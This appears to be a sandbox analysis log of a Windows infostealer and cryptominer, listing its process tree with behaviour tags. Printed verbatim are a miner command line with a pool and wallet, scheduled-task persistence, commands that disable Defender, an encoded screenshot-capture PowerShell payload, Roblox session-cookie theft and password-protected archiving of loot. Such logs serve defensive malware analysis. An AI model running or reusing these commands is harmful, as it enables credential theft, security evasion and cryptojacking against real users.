PID:6872 -
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:443 --user=4BHDQDtdSK2c9CQxpSptzvgbXgQ664JTqEnBvuXeueNLGGg7CYHPtQNEnZ3YK9MQgbE6dsg92yX4B6QXpG3v7HAS2nGUBKr --pass=x --cpu-max-threads-hint=20 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth7⤵PID:6624
-
C:\Users\Admin\AppData\Roaming\Windows\Defender\WinDefender.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\WinDefender.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5552 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinSDK.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinSDK.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5932 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"' & exit6⤵PID:5524
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\Admin\AppData\Roaming\svchost.exe"'7⤵
- Scheduled Task/Job: Scheduled Task
PID:6840 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp58D9.tmp.bat""6⤵PID:5648
-
C:\Windows\system32\timeout.exetimeout 37⤵
- Delays execution with timeout.exe
PID:1300 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"7⤵
- Executes dropped EXE
PID:7068 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderRuntime.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpDefenderRuntime.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:5304 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5748 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe"5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5804 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe'"6⤵PID:5908
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4136 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"6⤵PID:4184
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4712 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe""6⤵
- Hide Artifacts: Hidden Files and Directories
PID:2244 -
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinDefenderService.exe"7⤵
- Views/modifies file attributes
PID:752 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"6⤵PID:5040
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1896 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"6⤵PID:1020
-
C:\Windows\system32\tasklist.exetasklist /FO LIST7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5096 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"6⤵PID:2612
-
C:\Windows\system32\tasklist.exetasklist /FO LIST7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5704 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"6⤵PID:5516
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName7⤵
- Suspicious use of AdjustPrivilegeToken
PID:6640 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"6⤵
- Clipboard Data
PID:4396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard7⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:6668 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"6⤵PID:5588
-
C:\Windows\system32\tasklist.exetasklist /FO LIST7⤵
- Enumerates processes with tasklist
PID:6676 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:5648
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:6864
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"6⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4612 -
C:\Windows\system32\netsh.exenetsh wlan show profile7⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:6904 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"6⤵PID:5168
-
C:\Windows\system32\systeminfo.exesysteminfo7⤵
- Gathers system information
PID:6996 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"6⤵PID:6096
-
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath7⤵PID:6840
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="6⤵PID:5984
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=7⤵
- Suspicious behavior: EnumeratesProcesses
PID:6892 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hr1u5m45\hr1u5m45.cmdline"8⤵PID:736
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5407.tmp" "c:\Users\Admin\AppData\Local\Temp\hr1u5m45\CSCFCAF61994D744DF592AB73FA113EA9A7.TMP"9⤵PID:6832
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:7164
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:6288
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"6⤵PID:6168
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts7⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:6692 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:6428
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:6720
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:6728
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:1844
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"6⤵PID:6936
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts7⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:6600 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:1712
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:5516
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"6⤵PID:5880
-
C:\Windows\system32\tasklist.exetasklist /FO LIST7⤵
- Enumerates processes with tasklist
PID:6412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"6⤵PID:620
-
C:\Windows\system32\tree.comtree /A /F7⤵PID:6164
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5112"6⤵PID:6108
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 51127⤵
- Kills process with taskkill
PID:1712 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2784"6⤵PID:5292
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 27847⤵
- Kills process with taskkill
PID:6904 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5112"6⤵PID:5164
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 51127⤵
- Kills process with taskkill
PID:5140 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2164"6⤵PID:6736
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 21647⤵
- Kills process with taskkill
PID:3412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2784"6⤵PID:5736
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 27847⤵
- Kills process with taskkill
PID:5912 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1848"6⤵PID:5888
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 18487⤵
- Kills process with taskkill
PID:6012 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2164"6⤵PID:7108
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 21647⤵
- Kills process with taskkill
PID:6956 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2692"6⤵PID:5280
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 26927⤵
- Kills process with taskkill
PID:5988 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 1848"6⤵PID:5396
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 18487⤵
- Kills process with taskkill
PID:6832 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4032"6⤵PID:6980
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40327⤵
- Kills process with taskkill
PID:2224 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 2692"6⤵PID:1136
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 26927⤵
- Kills process with taskkill
PID:400 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5072"6⤵PID:6504
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 50727⤵
- Kills process with taskkill
PID:6264 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 4032"6⤵PID:5492
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:6640
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 40327⤵
- Kills process with taskkill
PID:7120 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "getmac"6⤵PID:6304
-
C:\Windows\system32\getmac.exegetmac7⤵PID:5564
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 232"6⤵PID:4428
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 2327⤵
- Kills process with taskkill
PID:6492 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 5072"6⤵PID:5356
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 50727⤵
- Kills process with taskkill
PID:6748 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 116"6⤵PID:6676
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 1167⤵
- Kills process with taskkill
PID:6412 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 232"6⤵PID:5604
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 2327⤵
- Kills process with taskkill
PID:4964 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /PID 116"6⤵PID:5752
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:1020
-
C:\Windows\system32\taskkill.exetaskkill /F /PID 1167⤵
- Kills process with taskkill
PID:5420 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"6⤵PID:5932
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵
- Command and Scripting Interpreter: PowerShell
PID:2544 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"6⤵PID:6760
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY7⤵PID:7012
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI57482\rar.exe a -r -hp"h3x" "C:\Users\Admin\AppData\Local\Temp\zXZ4E.zip" *"6⤵PID:6868
-
C:\Users\Admin\AppData\Local\Temp\_MEI57482\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI57482\rar.exe a -r -hp"h3x" "C:\Users\Admin\AppData\Local\Temp\zXZ4E.zip" *7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4192 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"6⤵PID:4848
-
